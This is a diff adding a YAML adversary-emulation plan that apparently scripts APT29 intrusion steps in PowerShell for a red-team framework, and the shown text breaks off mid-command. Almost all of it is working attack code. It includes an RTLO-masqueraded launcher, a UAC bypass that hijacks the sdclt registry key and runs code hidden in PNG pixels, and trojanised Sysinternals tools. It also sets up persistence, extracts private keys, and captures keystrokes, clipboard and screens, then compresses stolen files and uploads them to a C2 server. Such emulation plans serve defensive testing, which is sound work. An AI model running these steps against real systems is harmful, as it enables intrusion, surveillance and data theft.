diff --git a/apt29/Emulation_Plan/yaml/APT29-Day1.A.yaml b/apt29/Emulation_Plan/yaml/APT29-Day1.A.yaml new file mode 100644 index 00000000..bb32aca1 --- /dev/null +++ b/apt29/Emulation_Plan/yaml/APT29-Day1.A.yaml 
@@ -0,0 +1,1140 @@ +# APT29-Day1.A.yaml - CALDERA and Atomic style TTPs + +- emulation_plan_details: + id: 8d3c142e-9d26-42e3-ad78-b3841373a789 + adversary_name: APT29 Day 1.A + adversary_description: APT29 is a threat group that has been attributed to the Russian government who have been in operation since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015. This adversary models scenario Day 1.A of the APT29. + attack_version: 8.1 + format_version: 1.0 + +# Step 1 - Initial Breach + +- id: 571845f6-b75c-4b9d-a666-a78f7827261f + name: RTLO Start Sandcat + description: Perform RTLO technique with SANDCAT + tactic: execution + technique: + attack_id: T1036.002 + name: "Masquerading: Right-to-Left Override" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163405/CosmicDuke.pdf" + procedure_group: procedure_execution + procedure_step: "1.A" + platforms: + windows: + psh,pwsh: + command: | + Sleep 3; + $bin = Get-ChildItem *cod*scr*; + $arguments = '-server "#{server}" -group "rtlo_group"'; + start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments; + + if ($?) { + write-host "Successfully completed RTLO execution. A new agent should appear"; + exit 0; + + } else { + write-host "Failure of RTLO execution."; + exit 1; + } + payloads: + - cod.3aka3.scr + + input_arguments: + server: + description: IP or Hostname of server + type: string + default: 192.0.2.10 + + executors: + - name: powershell + command: | + Sleep 3; + $bin = Get-ChildItem *cod*scr*; + $arguments = '-server "#{server}" -group "rtlo_group"'; + start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments; + + if ($?) { + write-host "Successfully completed RTLO execution. 
A new agent should appear"; + exit 0; + + } else { + write-host "Failure of RTLO execution."; + exit 1; + } + +- id: a5daa530-c640-49bc-aa54-6808789a684a + name: PowerShell + description: Spawn powershell.exe from cmd.exe + tactic: execution + technique: + attack_id: T1059.001 + name: "Command and Scripting Interpreter: PowerShell" + cti_source: "https://securelist.com/the-cozyduke-apt/69731/" + procedure_group: procedure_execution + procedure_step: "1.B" + platforms: + windows: + cmd: + command: | + powershell.exe; + if ($?) { + write-host "[*] PowerShell successfully spawned"; + exit 0; + } + + executors: + - name: command_prompt + command: | + powershell.exe; + if ($?) { + write-host "[*] PowerShell successfully spawned"; + exit 0; + } + +# Step 2 - Rapid Collection and Exfiltration + +- id: 5692da31-3586-4e4f-8f07-5750070c730b + name: Automated Collection + description: Execute PowerShell from cmd.exe to collect and compress files of specific extensions. + tactic: collection + technique: + attack_id: T1119 + name: "Automated Collection" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_collection + procedure_step: "2.A" + platforms: + windows: + psh,pwsh: + command: | + $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force + + executors: + - name: powershell + command: | + $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include 
*.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force + +- id: 68e209dd-f354-4adc-8bc6-e85a3e55a7f4 + name: Data from staged fileand Exfiltration over C2 Channel + description: Copy a target file from a remote file share through the existing C2 channel + tactic: exfiltration + technique: + attack_id: T1041 + name: "Exfiltration Over Command and Control Channel" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_exfiltration + procedure_step: "2.B" + platforms: + windows: + psh,pwsh: + command: | + Import-Module .\upload.ps1 -Verbose -Force; + Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\AppData\Roaming\Draft.zip" -Uri "#{server}/file/upload"; + payloads: + - upload.ps1 + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + server: + description: IP or Hostname of server + type: string + default: 192.0.2.10 + + executors: + - name: powershell + command: | + Import-Module .\upload.ps1 -Verbose -Force; + Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\AppData\Roaming\Draft.zip" -Uri "#{server}/file/upload"; + +# Step 3 - Deploy Stealth Toolkit + +- id: 68b588bc-002a-42dc-bac7-9189f944065b + name: Staging monkey PNG + description: Staging PNG for Lateral Movement + tactic: defensive-evasion + technique: + attack_id: T1036.005 + name: "Masquerading: Match Legitimate Name or Location" + cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + procedure_group: procedure_def_evasion + procedure_step: "3.A" + platforms: + windows: + 
psh,pwsh: + command: | + $username="#{profile_user}"; + if ( $(test-path -path "C:\Users\$username\Downloads\monkey.png") -eq $false ) { + copy-item monkey.png -Destination "C:\Users\$username\Downloads\\" -Force; + if ($? -eq $True) { + write-host "[+] Successfully copied monkey.png!"; + get-childitem -path "C:\Users\$username\Downloads\\"; + exit 0; + } else { + write-host "[+] Failed to copy monkey.png."; + exit 1; + } + + } else { + write-host "[*] monkey.png already exists within C:\users\$username\Downloads..." + } + payloads: + - monkey.png + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + executors: + - name: powershell + command: | + $username="#{profile_user}"; + if ( $(test-path -path "C:\Users\$username\Downloads\monkey.png") -eq $false ) { + copy-item monkey.png -Destination "C:\Users\$username\Downloads\\" -Force; + if ($? -eq $True) { + write-host "[+] Successfully copied monkey.png!"; + get-childitem -path "C:\Users\$username\Downloads\\"; + exit 0; + } else { + write-host "[+] Failed to copy monkey.png."; + exit 1; + } + +- id: 89e9dffa-8836-4672-8cf3-bebd006d2a2b + name: UAC Bypass via Backup Utility + description: Modify registry values of sdclt to bypass UAC + tactic: privilege-escalation + technique: + attack_id: T1548.002 + name: "Abuse Elevation Control Mechanism: Bypass User Account Control" + cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + procedure_group: procedure_privesc + procedure_step: "3.B" + platforms: + windows: + psh,pwsh: + command: | + if (!(test-path -path $env:windir\system32\sdclt.exe)) { + write-host "[!] 
sdclt.exe was not found on this host."; + exit 1; + } + New-Item -Path HKCU:\Software\Classes -Name Folder -Force; + New-Item -Path HKCU:\Software\Classes\Folder -Name shell -Force; + New-Item -Path HKCU:\Software\Classes\Folder\shell -Name open -Force; + New-Item -Path HKCU:\Software\Classes\Folder\shell\open -Name command -Force; + + $username="#{profile_user}"; + $payload='powershell.exe -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName "System.Drawing"; $g=a System.Drawing.Bitmap("C:\Users\$($username)\Downloads\monkey.png");$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"'; + + Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "(Default)" -Value $payload -Force; + Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" -Value "" -Force; + + cmd.exe /c sdclt.exe; + cmd.exe /c powershell.exe; + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + executors: + - name: powershell + command: | + if (!(test-path -path $env:windir\system32\sdclt.exe)) { + write-host "[!] 
sdclt.exe was not found on this host."; + exit 1; + } + New-Item -Path HKCU:\Software\Classes -Name Folder -Force; + New-Item -Path HKCU:\Software\Classes\Folder -Name shell -Force; + New-Item -Path HKCU:\Software\Classes\Folder\shell -Name open -Force; + New-Item -Path HKCU:\Software\Classes\Folder\shell\open -Name command -Force; + + $username="#{profile_user}"; + $payload='powershell.exe -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName "System.Drawing"; $g=a System.Drawing.Bitmap("C:\Users\$($username)\Downloads\monkey.png");$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"'; + + Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "(Default)" -Value $payload -Force; + Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" -Value "" -Force; + + cmd.exe /c sdclt.exe; + cmd.exe /c powershell.exe; + +- id: 5ff80022-8d85-410b-b868-6c7565b267e5 + name: Registry Cleanup for UAC Bypass Technique + description: Delete registry entries post-UAC bypass. 
+ tactic: defensive-evasion + technique: + attack_id: T1112 + name: "Modify Registry" + cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + procedure_group: procedure_def_evasion + procedure_step: "3.C" + platforms: + windows: + psh,pwsh: + command: | + Remove-Item -Path HKCU:\Software\Classes\Folder* -Recurse -Force; + if (!(test-path -path HKCU:\Software\Classes\Folder)) { + write-host "[+] Reg keys removed!"; + } + + executors: + - name: powershell + command: | + Remove-Item -Path HKCU:\Software\Classes\Folder* -Recurse -Force; + if (!(test-path -path HKCU:\Software\Classes\Folder)) { + write-host "[+] Reg keys removed!"; + } + +# Step 4 - Defense Evasion and Discovery + +- id: 4f7d21c9-ea31-4943-ad8a-efbbeeccdd7d + name: Planting Modified Sysinternals Utilities + description: Uploading payloads masquerading as via modified SysInternalsSuite + tactic: stage-capabilities + technique: + attack_id: T1036.005 + name: "Masquerading: Match Legitimate Name or Location" + cti_source: "N/A" + procedure_group: procedure_staging + procedure_step: "4.A" + platforms: + windows: + psh,pwsh: + command: | + iwr -uri "https://download.sysinternals.com/files/SysinternalsSuite.zip" -outfile SysInternalsSuite.zip; + Expand-Archive -Path SysInternalsSuite.zip -DestinationPath "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -Force; + + if (! $?) { + write-host "Error moving files to #{profile_user}\Downloads"; + exit 1; + } + + Move-Item Modified-SysInternalsSuite.zip "C:\Users\#{profile_user}\Downloads" -Force; + Expand-Archive -LiteralPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -DestinationPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -Force; + + if (! $?) 
{ + write-host "Error expanding files to #{profile_user}\Downloads"; + exit 1; + } + + $dir_exists=Test-Path -path "C:\Program Files\SysInternalsSuite"; + if ($dir_exists -eq $true) { + write-host "[*] SysInternalsSuite folder exists within \"C:\Program Files\", copying over payloads then removing folder from Downloads."; + Move-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + Move-Item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + } else { + mkdir "C:\Program Files\SysInternalsSuite"; + Copy-Item -Path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + Copy-Item -Path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + } + + if (test-path -path "SysInternalsSuite.zip") { + Remove-Item -path "filesystem::SysInternalsSuite.zip" -force; + } + + if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" ) { + remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -force; + } + + if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite") { + remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -recurse -force; + } + + if (test-path -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite") { + Remove-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -recurse -force; + } + + Set-Location -path "C:\Program Files\SysInternalsSuite"; + if ($?) { + gci; + write-host "[*] Successfully planted files" + } else { + write-host "[!] Error downloading and planting modified system tools." 
+ } + + payloads: + - Modified-SysInternalsSuite.zip + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + executors: + - name: powershell + command: | + iwr -uri "https://download.sysinternals.com/files/SysinternalsSuite.zip" -outfile SysInternalsSuite.zip; + Expand-Archive -Path SysInternalsSuite.zip -DestinationPath "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -Force; + + if (! $?) { + write-host "Error moving files to #{profile_user}\Downloads"; + exit 1; + } + + Move-Item Modified-SysInternalsSuite.zip "C:\Users\#{profile_user}\Downloads" -Force; + Expand-Archive -LiteralPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -DestinationPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -Force; + + if (! $?) { + write-host "Error expanding files to #{profile_user}\Downloads"; + exit 1; + } + + $dir_exists=Test-Path -path "C:\Program Files\SysInternalsSuite"; + if ($dir_exists -eq $true) { + write-host "[*] SysInternalsSuite folder exists within \"C:\Program Files\", copying over payloads then removing folder from Downloads."; + Move-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + Move-Item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + } else { + mkdir "C:\Program Files\SysInternalsSuite"; + Copy-Item -Path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + Copy-Item -Path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; + } + + if (test-path -path "SysInternalsSuite.zip") { + Remove-Item -path "filesystem::SysInternalsSuite.zip" -force; + } + + if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" ) { + 
remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -force; + } + + if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite") { + remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -recurse -force; + } + + if (test-path -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite") { + Remove-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -recurse -force; + } + + Set-Location -path "C:\Program Files\SysInternalsSuite"; + if ($?) { + gci; + write-host "[*] Successfully planted files" + } else { + write-host "[!] Error downloading and planting modified system tools." + } + +- id: 646be6c9-f27a-4f5f-be5d-b8a0317e215f + name: Process Discovery + description: List running process on the machine via PowerShell. + tactic: discovery + technique: + attack_id: T1057 + name: "Process Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "4.B.1" + platforms: + windows: + psh,pwsh: + command: | + $ps = get-process; + write-output $ps; + + executors: + - name: powershell + command: | + $ps = get-process; + write-output $ps; + +- id: 9b5b5aec-32ff-4d74-8555-727b50ab15f6 + name: Artifact Cleanup - Delete Files + description: Cleanup files related to Operation + tactic: defensive-evasion + technique: + attack_id: T1070.004 + name: "Indicator Removal on Host: File Deletion" + cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + procedure_group: procedure_def_evasion + procedure_step: "4.B.2" + platforms: + windows: + psh,pwsh: + command: | + if (! $(test-path -path "C:\Program Files\SysInternalsSuite";)) { + write-host "[!] 
The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; + exit 1; + } + Set-Location -path "C:\Program Files\SysInternalsSuite"; + gci $env:userprofile\Desktop; + .\sdelete64.exe /accepteula "$env:USERPROFILE\Desktop\‮cod.3aka3.scr"; + .\sdelete64.exe /accepteula "$env:APPDATA\Draft.Zip"; + .\sdelete64.exe /accepteula "$env:USERPROFILE\Downloads\SysInternalsSuite.zip"; + + executors: + - name: powershell + command: | + if (! $(test-path -path "C:\Program Files\SysInternalsSuite";)) { + write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; + exit 1; + } + Set-Location -path "C:\Program Files\SysInternalsSuite"; + gci $env:userprofile\Desktop; + .\sdelete64.exe /accepteula "$env:USERPROFILE\Desktop\‮cod.3aka3.scr"; + .\sdelete64.exe /accepteula "$env:APPDATA\Draft.Zip"; + .\sdelete64.exe /accepteula "$env:USERPROFILE\Downloads\SysInternalsSuite.zip"; + +- id: 6f1f4768-7099-45d2-a858-b49dc792234e + name: Loading Stage-2 & Performing Discovery + description: Load Stage-2 from Modified Sysinternals Toolset + tactic: discovery + technique: + attack_id: T1082 + name: "System Information Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "4.C.1" + platforms: + windows: + psh,pwsh: + command: | + if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { + write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysInternalsSuite"; + if (!(test-path ".\readme.ps1")) { + Move-Item .\readme.txt readme.ps1 -Force; + } + . .\readme.ps1; + Invoke-Discovery; + + executors: + - name: powershell + command: | + if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { + write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. 
Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysInternalsSuite"; + if (!(test-path ".\readme.ps1")) { + Move-Item .\readme.txt readme.ps1 -Force; + } + . .\readme.ps1; + Invoke-Discovery; + +# Step 5 - Persistence + +- id: 9c75155e-21ab-4471-af16-45f3795a313c + name: Persistent Service 1 + description: Leverage modified Sysinternals + tactic: persistence + technique: + attack_id: T1547.009 + name: "Boot or Logon Autostart Execution: Shortcut Modification" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_persistence + procedure_step: "5.A" + platforms: + windows: + psh,pwsh: + command: | + Set-Location -path "C:\Program Files\SysinternalsSuite"; + if (get-service -name "javamtsup" -ErrorAction SilentlyContinue) { + write-host "[*] Service already exists...Not running persistence step-1"; + exit 1; + } + + if (Test-Path -path "readme.ps1") { + . .\readme.ps1; + Invoke-Persistence -PersistStep 1; + write-host "[+] Persistence 1 invoked."; + exit 0; + + } else { + write-host "[!] readme.ps1 not found."; + exit 1; + } + + executors: + - name: powershell + command: | + Set-Location -path "C:\Program Files\SysinternalsSuite"; + if (get-service -name "javamtsup" -ErrorAction SilentlyContinue) { + write-host "[*] Service already exists...Not running persistence step-1"; + exit 1; + } + + if (Test-Path -path "readme.ps1") { + . .\readme.ps1; + Invoke-Persistence -PersistStep 1; + write-host "[+] Persistence 1 invoked."; + exit 0; + + } else { + write-host "[!] 
readme.ps1 not found."; + exit 1; + } + +- id: 45f18b58-c14f-4b61-a3da-41b67af21429 + name: Persistent Service 2 + description: Leverage modified Sysinternals + tactic: persistence + technique: + attack_id: T1547.009 + name: "Boot or Logon Autostart Execution: Shortcut Modification" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_persistence + procedure_step: "5.B" + platforms: + windows: + psh,pwsh: + command: | + Set-Location -path "C:\Program Files\SysinternalsSuite"; + if (Test-Path -path "readme.ps1") { + . .\readme.ps1; + Invoke-Persistence -PersistStep 2; + write-host "[+] Persistence 2 invoked."; + + } else { + write-host "[!] readme.ps1 not found."; + return 1; + } + + executors: + - name: powershell + command: | + Set-Location -path "C:\Program Files\SysinternalsSuite"; + if (Test-Path -path "readme.ps1") { + . .\readme.ps1; + Invoke-Persistence -PersistStep 2; + write-host "[+] Persistence 2 invoked."; + + } else { + write-host "[!] readme.ps1 not found."; + return 1; + } + +# Step 6 - Credential Access + +- id: e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d + name: Credentials In Files- Chrome + description: Obtain credentials from Chrome Dumper + tactic: credential-access + technique: + attack_id: T1003 + name: "Credential Dumping" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_cred_access + procedure_step: "6.A" + platforms: + windows: + psh,pwsh: + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysinternalsSuite"; + ./accesschk.exe -accepteula .; + + executors: + - name: powershell + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] 
The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysinternalsSuite"; + ./accesschk.exe -accepteula .; + +- id: c4f4b13c-87b6-498c-b814-93570173068c + name: Credentials In Files (T1081) - Private Keys Extraction + description: Obtain credentials via Custom PowerShell + tactic: credential-access + technique: + attack_id: T1552.004 + name: "Unsecured Credentials: Private Keys" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_cred_access + procedure_step: "6.B" + platforms: + windows: + psh,pwsh: + command: | + Import-PfxCertificate -Exportable -FilePath ".\dmevals.local.pfx" -CertStoreLocation Cert:\LocalMachine\My; + + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\readme.ps1; + Get-PrivateKeys; + if ($? -eq $True) { + write-host "[+] Successfully executed private key collection script."; + exit 0; + } else { + write-host "[!] Error, could not execution Get-PrivateKeys."; + exit 1; + } + payloads: + - dmevals.local.pfx + + executors: + - name: powershell + command: | + Import-PfxCertificate -Exportable -FilePath ".\dmevals.local.pfx" -CertStoreLocation Cert:\LocalMachine\My; + + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\readme.ps1; + Get-PrivateKeys; + if ($? -eq $True) { + write-host "[+] Successfully executed private key collection script."; + exit 0; + } else { + write-host "[!] 
Error, could not execution Get-PrivateKeys."; + exit 1; + } + +# TODO +# 6.C "Dump password hashes: [meterpreter*] > run post/windows/gather/credentials/credential_collector" missing! + +# Step 7 - Collection and Exfiltration + +- id: a4b14c10-49aa-4ae4-b165-d5a37364fe62 + name: Staging files for PowerShell module imports + description: Renaming psversion.txt to psversion.txt to be imported + tactic: defensive-evasion + technique: + attack_id: T1036.005 + name: "Masquerading: Match Legitimate Name or Location" + cti_source: "https://securelist.com/the-cozyduke-apt/69731/" + procedure_group: procedure_def_evasion + procedure_step: "7.A.1" + platforms: + windows: + psh,pwsh: + command: | + if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { + write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysInternalsSuite"; + if (test-path -path ".\psversion.txt" ) { + move-item .\psversion.txt psversion.ps1 -Force; + } + write-host "[+] File psversion.ps1 staged to be imported." + + executors: + - name: powershell + command: | + if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { + write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysInternalsSuite"; + if (test-path -path ".\psversion.txt" ) { + move-item .\psversion.txt psversion.ps1 -Force; + } + write-host "[+] File psversion.ps1 staged to be imported." + +- id: a81ea4ad-bc9f-49a7-82d4-4466df641487 + name: Screen Capturing + description: Load custom PowerShell module and take screenshots. + tactic: collection + technique: + attack_id: T1113 + name: "Screen Capture" + cti_source: "https://securelist.com/the-cozyduke-apt/69731/" + procedure_group: procedure_collection + procedure_step: "7.A.2" + platforms: + windows: + psh,pwsh: + command: | + if (! 
$(test-path -path "C:\Program Files\SysinternalsSuite\psversion.ps1";)) { + write-host "[!] The path C:\Program Files\SysinternalsSuite\psversion.ps1 does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\psversion.ps1; + Invoke-ScreenCapture; Start-Sleep -Seconds 3; View-Job -JobName "Screenshot"; + + executors: + - name: powershell + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite\psversion.ps1";)) { + write-host "[!] The path C:\Program Files\SysinternalsSuite\psversion.ps1 does not exist. Execution has stopped."; + exit 1; + } + + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\psversion.ps1; + Invoke-ScreenCapture; Start-Sleep -Seconds 3; View-Job -JobName "Screenshot"; + +- id: ee4c2eab-be57-434c-a32c-14b77360301a + name: Automated Collection (T1119) - Clipboard (T1115) + description: Get contents of clipboard + tactic: collection + technique: + attack_id: T1115 + name: "Clipboard Data" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_collection + procedure_step: "7.A.3" + platforms: + windows: + psh,pwsh: + command: | + $clip_data=get-clipboard; + if ($clip_data.Length -gt 0) { + write-host "[+] Clipboard data obtained!\n"; + write-host $clip_data; + } else { + write-host "[!] No clipboard data available!\n"; + } + + executors: + - name: powershell + command: | + $clip_data=get-clipboard; + if ($clip_data.Length -gt 0) { + write-host "[+] Clipboard data obtained!\n"; + write-host $clip_data; + } else { + write-host "[!] No clipboard data available!\n"; + } + +- id: db28f68d-e8b8-46e6-b680-642570d4b257 + name: Automated Collection (T1119) - Input Capture (T1417) + description: Load custom PowerShell module, and grab keystrokes for 15 seconds. 
+ tactic: collection + technique: + attack_id: T1056.001 + name: "Input Capture: Keylogging" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_collection + procedure_step: "7.A.4" + platforms: + windows: + psh,pwsh: + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\psversion.ps1; + Get-Keystrokes; + Start-Sleep -Seconds 15; + View-Job -JobName "Keystrokes"; + + executors: + - name: powershell + command: | + if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { + write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; + exit 1; + } + Set-Location -path "C:\Program Files\SysinternalsSuite"; + . .\psversion.ps1; + Get-Keystrokes; + Start-Sleep -Seconds 15; + View-Job -JobName "Keystrokes"; + +- id: a612311d-a802-48da-bb7f-88a4b9dd7a24 + name: Data from staged file (T1074) and Exfiltration over C2 Channel (T1041) + description: Compress all data within Download directory and exfiltrate the results. + tactic: exfiltration + technique: + attack_id: T1041 + name: "Exfiltration Over C2 Channel" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_exfiltration + procedure_step: "7.B" + platforms: + windows: + psh,pwsh: + command: | + Write-Host "[*] Compressing all the things in download dir"; + Compress-Archive -Path "C:\Users\#{profile_user}\Downloads\*.*" -DestinationPath "$env:APPDATA\OfficeSupplies.zip"; + + Import-Module .\upload.ps1 -Verbose -Force; + Invoke-MultipartFormDataUpload -InFile "$env:APPDATA\OfficeSupplies.zip" -Uri "#{server}/file/upload"; + if ($?) 
